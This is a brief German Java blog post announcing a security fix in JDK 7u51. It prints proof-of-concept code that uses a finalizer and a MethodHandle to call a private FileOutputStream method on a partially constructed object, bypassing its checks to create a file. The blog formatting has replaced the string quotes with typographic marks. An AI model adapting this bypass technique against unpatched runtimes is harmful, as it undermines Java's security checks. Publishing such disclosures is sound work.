Java Blog

Interessanter Sicherheits-Bug in 7u51 gefixed

Details unter http://weblog.ikvm.net/2014/01/16/PubliclyReportedOpenJDKVulnerabilityFixedIn7u51.aspx:

import java.lang.invoke.*;
class test extends java.io.FileOutputStream {
  static test t;
  test() throws Exception {
    super(„“);
  }
  protected void finalize() {
    t = this;
  }
  public static void main(String[] args) throws Throwable {
    MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, „open“,
                        MethodType.methodType(void.class, String.class, boolean.class));
    System.out.println(mh);
    try { new test(); } catch (Exception _) { }
    System.gc();
    System.runFinalization();
    mh.invokeExact(t, „oops.txt“, false);
  }
}